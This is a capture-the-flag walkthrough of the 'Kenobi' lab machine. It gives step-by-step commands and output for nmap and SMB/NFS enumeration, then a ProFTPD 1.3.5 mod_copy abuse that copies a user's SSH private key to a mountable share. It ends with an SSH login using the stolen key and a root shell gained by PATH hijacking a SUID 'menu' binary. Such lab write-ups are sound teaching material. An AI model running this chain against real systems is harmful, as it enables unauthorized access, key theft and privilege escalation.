Run nmap, do some recon, gather some info:
$ nmap -vvv -Pn -sCV -p0-65535 --reason -oN kenobi.nmap 10.10.119.248
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-12 17:32 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:32
Completed Parallel DNS resolution of 1 host. at 17:32, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:32
Scanning 10.10.119.248 [65536 ports]
Discovered open port 445/tcp on 10.10.119.248
Discovered open port 111/tcp on 10.10.119.248
Discovered open port 139/tcp on 10.10.119.248
Discovered open port 80/tcp on 10.10.119.248
Discovered open port 22/tcp on 10.10.119.248
Discovered open port 21/tcp on 10.10.119.248
Discovered open port 35627/tcp on 10.10.119.248
Discovered open port 39223/tcp on 10.10.119.248
...
Run nmap smb enum scripts on port 445:
smb-enum-shares
smb-enum-users
$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.119.248
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-12 17:35 EST
Nmap scan report for 10.10.119.248
Host is up (0.16s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.119.248\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.119.248\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.119.248\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 24.80 seconds
Log into smb with smbclient to the anonymous share. Locate any interesting files and download them:
$ smbclient //10.10.119.248/anonymous
Enter WORKGROUP\root password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 2019
9204224 blocks of size 1024. 6877092 blocks available
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (15.2 KiloBytes/sec) (average 15.2 KiloBytes/sec)
smb: \> exit
Very useful information is inside the log.txt file that can be used later.
Run nmap NFS share scripts on port 111:
nmap.org/nsedoc/scripts/nfs-ls
nmap.org/nsedoc/scripts/nfs-statfs
nmap.org/nsedoc/scripts/nfs-showmount
book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind
$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.119.248
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-12 17:40 EST
Nmap scan report for 10.10.119.248
Host is up (0.16s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836520.0 6877108.0 22% 16.0T 32000
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
Nmap done: 1 IP address (1 host up) scanned in 2.94 seconds
nfs-showmount reveals that the /var directory can be mounted.
Use netcat with verbose/telnet options to check for FTP port info:
$ nc -vt 10.10.119.248 21
10.10.119.248: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.119.248] 21 (ftp) open
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.119.248]
QUIT
221 Goodbye.
ProFTPD 1.3.5 Server Default Installation.
Use searchsploit to check for vulnerabilities:
$ searchsploit proftpd
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeBSD - 'ftpd / ProFTPd' Remote Command Execution | freebsd/remote/18181.txt
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow | linux/local/394.c
ProFTPd - 'mod_mysql' Authentication Bypass | multiple/remote/8037.txt
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC) | linux/dos/16129.txt
ProFTPd 1.2 - 'SIZE' Remote Denial of Service | linux/dos/20536.java
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit) | linux/remote/16852.rb
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) | linux/remote/19475.c
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) | linux/remote/19476.c
ProFTPd 1.2 pre6 - 'snprintf' Remote Root | linux/remote/19503.txt
ProFTPd 1.2.0 pre10 - Remote Denial of Service | linux/dos/244.java
ProFTPd 1.2.0 rc2 - Memory Leakage | linux/dos/241.c
ProFTPd 1.2.10 - Remote Users Enumeration | linux/remote/581.c
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force | linux/remote/110.c
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun | linux/dos/23170.c
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection | linux/remote/43.pl
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1) | linux/remote/107.c
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2) | linux/remote/3021.txt
ProFTPd 1.2.x - 'STAT' Denial of Service | linux/dos/22079.sh
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection | multiple/remote/32798.pl
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow | unix/local/10044.pl
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit) | linux/remote/2856.pm
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) | linux/local/3330.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) | linux/local/3333.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow | linux/local/3730.txt
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) | linux/dos/2928.py
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) | linux/remote/16878.rb
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) | linux/remote/16851.rb
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | linux/remote/15662.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
ProFTPD 1.3.7a - Remote Denial of Service | multiple/dos/49697.py
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow | linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution | linux/remote/15449.pl
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | linux/remote/16921.rb
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1) | linux/remote/19086.c
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2) | linux/remote/19087.c
WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion | linux/remote/20690.sh
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There are some other vulnerabilities found that can be researched and tested. "1.3.5 - File Copy" looks very interesting.
ProFTPd 1.3.5 - File Copy
Based on the info inside the log.txt file and the File Copy vulnerability, log into FTP and use CPFR/CPTO to put the kenobi id_rsa (SSH key) into the var directory:
$ nc 10.10.119.248 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.119.248]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
QUIT
221 Goodbye.
Create a directory and mount the /var directory. Copy the SSH key to your machine and change the permissions:
$ mkdir /mnt/kenobi
$ mount 10.10.119.248:/var /mnt/kenobi
$ la -la /mnt/kenobi
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 4 root root 4096 Jan 12 17:54 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Jan 12 17:53 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
$ cp /mnt/kenobi/tmp/id_rsa .
$ chmod 600 id_rsa
Use ssh with the id_rsa file to log in as kenobi:
$ ssh -i id_rsa kenobi@10.10.119.248
The authenticity of host '10.10.119.248 (10.10.119.248)' cannot be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.119.248' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ cd /home/kenobi/
kenobi@kenobi:~$ ls
share user.txt
Some commands to find SUID enabled files that can be executed.
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Run a command and see what's available:
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
This /usr/bin/menu looks interesting or a little out of place. Use strings to get some info about the package:
kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
Invalid choice
...
Run menu and see how they are the same:
kenobi@kenobi:~$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2022 21:16:05 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:~$ curl -I localhost
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2022 21:16:25 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:~$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic
kenobi@kenobi:~$ uname -r
4.8.0-58-generic
kenobi@kenobi:~$
The problem is that within menu it is not run from the absolute path. You can use menu to run a copy of one of the original commands after adding the tmp directory to PATH.
kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/bash > uname
kenobi@kenobi:/tmp$ chmod 777 uname
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@kenobi:/tmp#
You became root with bash. Exit and try again with sh:
root@kenobi:/tmp# exit
exit
kenobi@kenobi:/tmp$ rm -rf uname
kenobi@kenobi:/tmp$ echo /bin/sh > uname
kenobi@kenobi:/tmp$ chmod 777 uname
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
# whoami
root
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114
(sambashare)
# exit
kenobi@kenobi:/tmp$